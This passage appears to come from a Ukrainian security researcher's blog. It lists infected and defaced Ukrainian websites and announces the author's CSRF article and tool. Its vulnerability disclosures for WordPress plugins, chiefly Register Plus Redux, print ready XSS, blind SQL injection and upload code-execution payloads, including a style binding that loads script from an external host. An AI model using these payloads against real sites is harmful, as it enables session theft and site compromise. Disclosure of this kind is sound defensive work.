Websecurity - Веб безпека

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://if.gov.ua - інфікований державний сайт - інфекція була виявлена 13.12.2011. Зараз сайт не входить до переліку підозрілих.
• http://best-tv.com.ua - інфекція була виявлена 17.01.2012. Зараз сайт входить до переліку підозрілих.
• http://footclub.pp.ua - інфекція була виявлена 04.12.2011. Зараз сайт не входить до переліку підозрілих.
• http://bestcats.kiev.ua - інфекція була виявлена 21.01.2012. Зараз сайт входить до переліку підозрілих.
• http://doctorpharm.com.ua - інфекція була виявлена 28.11.2011. Зараз сайт не входить до переліку підозрілих.

Як і у випадку з іншими веб сайтами, інфікований сайт bestcats.kiev.ua також хостить в себе Укртелеком.

В цьому місяці в журналі “PenTest Extra” була опублікована моя стаття. В січневому номері журналу PenTest Extra 01/2012, що вийшов 15.01.2012, опублікована стаття “Business Logic vulnerabilities via CSRF” (на англійській мові).

В ній розповідається про Business Logic уразливості, атака на які проводиться через CSRF. Дані уразливості дозволяють викрадати гроші з рахунків користувачів на сайтах банків, електронних платіжних систем та інших е-комерс сайтів. Такі уразливості я неодноразово знаходив та писав про них в новинах.

Це нова редакція статті Business Logic уразливості через CSRF (перероблена та доповнена), що я опублікував в грудні 2010 року. В даній статті наводиться багато нового матеріалу порівняно з першою редакцією, зокрема новодяться сценарії атак на Business Logic уразливості та експлоти для них. Описуються однокрокові та багатокрокові атаки, зазначається необхідність таймінгу при багатокрокових атаках та наводяться приклади реальних уразливостей на е-комерс сайтах з відповідними експлоітами.

А також в даній статті я вперше анонсував свій новий інструмент Генератор CSRF, що призначений для створення CSRF експлотів. На якому були зроблені всі приклади експлоітів для статті.

В себе на сайті я виклав тізер журналу, в якому наводиться повний текст моєї статті. Так що можете почитати її .

Настав новий 2012 рік. І до своїх новорічних побажань, я також додам пропозицію подивитися мою святкову листівку на флеші .

Серед сюрпризів, що я приготовував в новому році та вже розмістив на сайті, є наступні. Другого січня я додав на сайт мій новий інструмент Генератор CSRF, що призначений для створення CSRF експлотів. Він стане в нагоді при проведенні секюріті досліджень та аудитів безпеки. Який став хорошим доповненням до таких моїх онлайн секюріті інструментів як Генератор XSS та SQL Injection ASCII Encoder та інших секюріті програм.

А в розділі Статті та доповіді на минулому тижні я розмістив тізер журналу PenTest Extra 01/2012, в якому опублікована моя нова стаття Business Logic vulnerabilities via CSRF. В якій я вперше анонсував свій новий інструмент Генератор CSRF, на якому були зроблені всі приклади експлоітів для статті.

Вже наближається 2012 рік і я поздоровляю вас з Новим Роком!

Бажаю всього найкращого вам в новому році, бажаю безпеки вам, вашим сайтам і веб додаткам .

Слідкуйте за безпекою власних сайтів і тоді з ними нічого поганого не трапиться. І вони будуть надійно працювати та приносити радість вам і вашим відвідувачам.

І для гарного святкового настрою можете послухати композицію Sense Of Beat (Energy Mix) з мого нового сінгла.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Skysa App Bar, 1 jquery photo gallery slideshow flash та Flash album gallery. Для котрих з’явилися експлоіти. Skysa App Bar - це плагін для розширення сайту за рахунок розміщення веб додатків на панелі, 1 jquery photo gallery slideshow flash - це плагін для створення фотогалереї, Flash album gallery - це також плагін для створення фотогалереї.

• Wordpress skysa-official plugin Cross-Site Scripting Vulnerabilities (деталі)
• Wordpress 1-jquery-photo-gallery-slideshow-flash plugin Cross-Site Scripting Vulnerabilities (деталі)
• Wordpress flash-album-gallery plugin Cross-Site Scripting Vulnerabilities (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

01.12.2011

Нещодавно, 25.11.2011, я знайшов 36 уразливостей в плагіні Register Plus Redux для WordPress. Перевірялася остання версія плагіна. Це друга з серії публікацій про нові дірки в даному плагіні. В якій я розповім про Cross-Site Scripting та Insufficient Anti-automation уразливості. Про що вже повідомив розробникам.

Раніше я вже писав про уразливості в Register Plus Redux для WordPress.

Детальна інформація про уразливості з’явиться пізніше.

31.12.2011

Persistent XSS:

На сторінці http://site/wp-admin/options-general.php ?page=register-plus-redux є наступні уразливості.

В полях: Email Verification, Admin Verification, User Message (якщо включений Custom New User Message), User Message (якщо включений Custom Verification Message), Admin Message (якщо включений Custom Admin Notification), Custom Register CSS, Custom Login CSS:
</textarea><script>alert(document.cookie)</script>
Код спрацює на сторінці http://site/wp-admin/options-general.php?page=register-plus-redux, а у випадку полей Email Verification і Admin Verification ще спрацює на сторінці http://site/wp-login.php?checkemail=registered.

Якщо вказати код в полях Custom Register CSS, Custom Login CSS:

body {-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml#xss)}

То код відповідно спрацює на сторінках http://site/wp-login.php?action=register та http://site/wp-login.php. Код спрацює в Firefox < 3.0, але якщо розмістити xml-файл на цьому ж сайті (через аплоадер), то можна буде атакувати й Firefox 3.0 і вище. А якщо вказати код з використанням expression, javascript або vbscript в стилях, то він виконається в IE.

Якщо вказати код в полі Minimum password length (в User Set Password) при включених опціях Require new users enter a password during registration та Show password strength meter:
1){}};alert(document.cookie);function a(){if(1==1
То код спрацює на сторінці http://site1/wp-login.php?action=register.

Якщо вказати код в полях Empty, Short, Bad, Good, Strong, Mismatch (в User Set Password) при включених опціях Require new users enter a password during registration та Show password strength meter:
"};alert(document.cookie);/*
То код спрацює на сторінці http://site/wp-login.php?action=register.

Якщо вказати код в полі Required Fields Style Rules:
-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml#xss)
То код спрацює на сторінці http://site/wp-login.php?action=register. Код спрацює в Firefox < 3.0, але якщо розмістити xml-файл на цьому ж сайті (через аплоадер), то можна буде атакувати й Firefox 3.0 і вище. А якщо вказати код з використанням expression, javascript або vbscript в стилях, то він виконається в IE.

Strictly Social XSS persistent:

У вищезгаданих полях User Message (якщо включений Custom New User Message), User Message (якщо включений Custom Verification Message), Admin Message (якщо включений Custom Admin Notification) окрім XSS в самому полі, є ще XSS через візуалізацію (що відбувається через jQuery), і відповідно при відправці POST запиту код спрацює двічі, й виправляти кожну з цих уразливостей потрібно в двох місцях (бо навіть заескейпчений html-код виконається). Також, окрім атаки через відправку POST запиту, можна провести XSS атаку через візуалізацію в цих трьох полях, а також в девяти інших полях (From Email, From Name, Subject в Custom New User Message, в Custom Verification Message та в Custom Admin Notification) при вставці XSS коду в поле.

Тобто потрібно обманним чином змусити жертву вставити код в одне з цих дванадцяти полів, при цьому код можна занести жертві в буфер через атаку через буфер обміну. Дані уразливості - це Strictly social XSS.

Insufficient Anti-automation:

http://site/wp-login.php?action=register

В формі реєстрації немає захисту від автоматизованих запитів (капчі). Як і в попередніх версіях плагіну.

Уразливі Register Plus Redux v3.7.3.1 та попередні версії. На замовлення мого клієнта я розробив нову версію плагіна з виправленними усіма знайденними мною уразливостями. Тому всі користувачі цього плагіна можуть знайти нову й безпечну версію плагіна в Інтернеті.

В грудні, 12.12.2011, вишла нова версія WordPress 3.3.

WordPress 3.3 це перший випуск нової 3.3 серії. В ній додано чимало покращень порівняно з попередніми версіями движка, в тому числі виправлено чимало багів.

Серед головних покращень зокрема можна відзначити підказки для нових користувачів системи, покращені навігацію, завантаження та імпорт. Новий аплоадер підтримує drag-and-drop можливість завантаження файлів. Для навігації з’явилися вспливаючі меню та новий тулбар. Покращена функція сумісного редагування та доданий імпорт з Tumblr.

А також покращена робота з дошкою оголошень (dashboard) на iPad та інших планшетах. Окрім покращень для користувачів також були зроблені численні покращення для розробників.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://csam.archives.gov.ua (хакером nO lOv3) - 09.10.2011 - взломаний державний сайт, зараз сайт вже виправлений адмінами
• http://bereg-rda.gov.ua (хакером Dr-Angel) - 12.10.2011 - взломаний державний сайт, txt-файл нападника все ще розміщений в кореневій папці сайта
• http://www.fpvk.org (хакером biangrusuh) - 14.02.2011, зараз сайт не працює
• http://alpha-ug.com.ua (хакером Dr-Angel) - 12.10.2011, зараз сайт вже виправлений адмінами
• http://aishadance.com (хакером Dr-Angel) - 12.10.2011, зараз сайт вже виправлений адмінами

30.11.2011

Нещодавно, 25.11.2011, я знайшов 36 уразливостей в плагіні Register Plus Redux для WordPress. Перевірялася остання версія плагіна. Це перша з серії публікацій про нові дірки в даному плагіні. В якій я розповім про Cross-Site Scripting, SQL Injection, Code Execution та Full path disclosure уразливості. Про що вже повідомив розробникам.

Раніше я вже писав про уразливості в Register Plus Redux для WordPress.

Детальна інформація про уразливості з’явиться пізніше.

29.12.2011

XSS:

POST запит на сторінці http://site/wp-login.php?action=register
</textarea><script>alert(document.cookie)</script>В полі: About Yourself.

Використовуючи функцію Autocomplete URL можна провести атаку через GET:

http://site/wp-login.php?action=register&description=%3C/textarea%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Всі атаки на persistent XSS та persistent SQL Injection уразливості на сторінці конфігурації плагіна можуть проводитися через reflected XSS уразливості з метою обходу захисту від CSRF-атак.

Persistent XSS:

При включенні в налаштуваннях плагіна опції Show Invitation Code Tracking widget on Dashboard та додання коду запрошення (Add a new invitation code), можна вказати JS/VBS код.
<script>alert(document.cookie)</script>
Який спрацює на сторінці Dashboard (http://site/wp-admin/index.php). Це дефолтна сторінка, на яку заходять адмін та користувачі сайта при аутентифікації.

Persistent SQL Injection:

При включенні в налаштуваннях плагіна опції Show Invitation Code Tracking widget on Dashboard та додання коду запрошення (Add a new invitation code), можна вказати код для SQL ін’єкції.
' and benchmark(1000000,md5(now())) and 1='1Який спрацює при відвідуванні сторінки Dashboard (http://site/wp-admin/index.php). Це Persistent Blind SQL Injection.

Code Execution:

Маючи доступ до налаштувань плагіна, можна провести Code Execution через аплоаідінг 1.phtml.jpg. Це залежить від версії движка, про що я писав в записі Виконання коду в WordPress 2.5 - 3.1.1. Дана атака спрацює в версіях движка до WordPress 3.1.3, де розробники виправили функціонал аплоадінга (що використовується плагіном).

Full path disclosure:

http://site/wp-content/plugins/register-plus-redux/register-plus-redux.php

В register-plus-redux.php є FPD як і в попередніх версіях. А файл dash_widget.php (з FPD) перероблений на dashboard_invitation_tracking_widget.php, в якому вже немає FPD.

Так само як і виправлена FPD при POST запиті на сторінці http://site/wp-login.php?action=register. Але спеціальним чином її можна відновити.

При доданні нового поля в Additional Fields і при вказанні 1 (або майже будь-якого значення) в полі Options та включенні опції Show on Registration, з’явиться FPD при POST запиті на сторінці http://site/wp-login.php?action=register.

Також можна додати на сайт ще дві FPD уразливості. Якщо вказати Custom Logo URL адресу не до файла зображення або просто “http://”, то буде виводиться повідомлення про помилку з FPD на сторінках http://site/wp-admin/options-general.php ?page=register-plus-redux і http://site/wp-login.php?action=register.

Уразливі Register Plus Redux v3.7.3.1 та попередні версії. На замовлення мого клієнта я розробив нову версію плагіна з виправленними усіма знайденними мною уразливостями. Тому всі користувачі цього плагіна можуть знайти нову й безпечну версію плагіна в Інтернеті.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://joomla-ua.com - інфекція була виявлена 28.11.2011. Зараз сайт не входить до переліку підозрілих.
• http://fondigs.lg.ua - інфекція була виявлена 20.10.2011. Зараз сайт не входить до переліку підозрілих.
• http://searivera.com.ua - інфекція була виявлена 18.10.2011. Зараз сайт не входить до переліку підозрілих.
• http://users.i.com.ua/~gladkey - інфекція була виявлена 29.10.2011. Зараз сайт не входить до переліку підозрілих.
• http://vixen.com.ua - інфекція була виявлена 03.11.2011. Зараз сайт не входить до переліку підозрілих.